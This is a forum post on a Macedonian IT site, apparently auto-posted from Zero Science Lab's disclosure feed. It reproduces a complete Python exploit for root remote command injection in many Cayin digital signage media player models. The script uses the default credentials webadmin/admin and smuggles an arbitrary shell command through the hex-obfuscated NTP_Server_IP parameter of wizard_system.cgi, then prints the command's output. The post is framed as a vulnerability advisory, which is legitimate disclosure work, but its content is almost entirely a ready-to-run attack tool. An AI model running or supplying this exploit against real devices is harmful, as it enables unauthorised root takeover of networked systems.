1. Здраво и добредојдовте на форумот на IT.mk.

    Доколку сеуште не сте дел од најголемата заедница на ИТ професионалци и ентузијасти во Македонија, можете бесплатно да се - процесот нема да ви одземе повеќе од 2-3 минути, а за полесна регистрација овозможивме и регистрирање со Facebook и Steam.
    Сокриј

Cayin Signage Media Player 3.0 Root Remote Command Injection

Дискусија во форумот 'Ранливости // Експлоити // Закрпи' започната од zeroscience, 4 Јуни 2020.

  1. zeroscience

    zeroscience
    ZSL Bot v4.89.1.00

    636
    514
    31 Мај 2010
    Код:
    #!/usr/bin/env python3
    #
    #
    # Cayin Signage Media Player 3.0 Root Remote Command Injection
    #
    #
    # Vendor: CAYIN Technology Co., Ltd.
    # Product web page: https://www.cayintech.com
    # Affected version: SMP-8000QD v3.0
    #                   SMP-8000 v3.0
    #                   SMP-6000 v3.0 Build 19025
    #                   SMP-6000 v1.0 Build 14246
    #                   SMP-6000 v1.0 Build 14199
    #                   SMP-6000 v1.0 Build 14167
    #                   SMP-6000 v1.0 Build 14097
    #                   SMP-6000 v1.0 Build 14090
    #                   SMP-6000 v1.0 Build 14069
    #                   SMP-6000 v1.0 Build 14062
    #                   SMP-4000 v1.0 Build 14098
    #                   SMP-4000 v1.0 Build 14092
    #                   SMP-4000 v1.0 Build 14087
    #                   SMP-2310 v3.0
    #                   SMP-2300 v3.0 Build 19316
    #                   SMP-2210 v3.0 Build 19025
    #                   SMP-2200 v3.0 Build 19029
    #                   SMP-2200 v3.0 Build 19025
    #                   SMP-2100 v10.0 Build 16228
    #                   SMP-2100 v3.0
    #                   SMP-2000 v1.0 Build 14167
    #                   SMP-2000 v1.0 Build 14087
    #                   SMP-1000 v1.0 Build 14099
    #                   SMP-PROPLUS v1.5 Build 10081
    #                   SMP-WEBPLUS v6.5 Build 11126
    #                   SMP-WEB4 v2.0 Build 13073
    #                   SMP-WEB4 v2.0 Build 11175
    #                   SMP-WEB4 v1.5 Build 11476
    #                   SMP-WEB4 v1.5 Build 11126
    #                   SMP-WEB4 v1.0 Build 10301
    #                   SMP-300 v1.0 Build 14177
    #                   SMP-200 v1.0 Build 13080
    #                   SMP-200 v1.0 Build 12331
    #                   SMP-PRO4 v1.0
    #                   SMP-NEO2 v1.0
    #                   SMP-NEO v1.0
    #
    # Summary: CAYIN Technology provides Digital Signage
    # solutions, including media players, servers, and
    # software designed for the DOOH (Digital Out-of-home)
    # networks. We develop industrial-grade digital signage
    # appliances and tailored services so you don't have
    # to do the hard work.
    #
    # Desc: CAYIN SMP-xxxx suffers from an authenticated
    # OS command injection vulnerability using default
    # credentials. This can be exploited to inject and
    # execute arbitrary shell commands as the root user
    # through the 'NTP_Server_IP' HTTP GET parameter in
    # system.cgi and wizard_system.cgi pages.
    #
    # Tested on: CAYIN Technology KT-Linux v0.99
    #            Apache/1.3.42 (Unix)
    #            Apache/1.3.41 (Unix)
    #            PHP/5.2.5
    #            Linux 2.6.37
    #
    #
    # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    #                             @zeroscience
    #
    #
    # Advisory ID: ZSL-2020-5569
    # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5569.php
    #
    #
    # 15.05.2020
    #
    
    import requests
    import sys#____
    import re#_____
    
    if len(sys.argv) < 3:
        print("Cayin SMP WebManager Post-Auth RCE")
        print("Usage: ./cayin.py [ip] [cmd]")
        sys.exit(17)
    else:
        ip____address = sys.argv[1]
        ex____command = sys.argv[2]
    
    ur____identif  = b"\x68\x74\x74\x70\x3a\x2f\x2f"
    ur____identif += (bytes(ip____address, "utf-8"))
    ur____identif += b"\x2f\x63\x67\x69\x2d\x62\x69"
    ur____identif += b"\x6e\x2f\x77\x69\x7a\x61\x72"
    ur____identif += b"\x64\x5f\x73\x79\x73\x74\x65"
    ur____identif += b"\x6d\x2e\x63\x67\x69\x3f\x54"
    ur____identif += b"\x45\x53\x54\x5f\x4e\x54\x50"
    ur____identif += b"\x3d\x31\x26\x4e\x54\x50\x5f"
    ur____identif += b"\x53\x65\x72\x76\x65\x72\x5f"
    ur____identif += b"\x49\x50\x3d\x70\x6f\x6f\x6c"
    ur____identif += b"\x2e\x6e\x74\x70\x2e\x6f\x72"
    ur____identif += b"\x67\x25\x32\x36" ##########"
    ur____identif += (bytes(ex____command, "utf-8"))
    ur____identif += b"\x25\x32\x36" ##############"
    
    ht____request = requests.get(ur____identif, auth = ("webadmin", "admin"))
    re____outputs = re.search("</html>\n(.*)", ht____request.text, flags = re.S).group().strip("</html>\n")
    print(re____outputs)
    

    Zero Science Lab » Cayin Signage Media Player 3.0 Root Remote Command Injection
     

Сподели

Вчитување...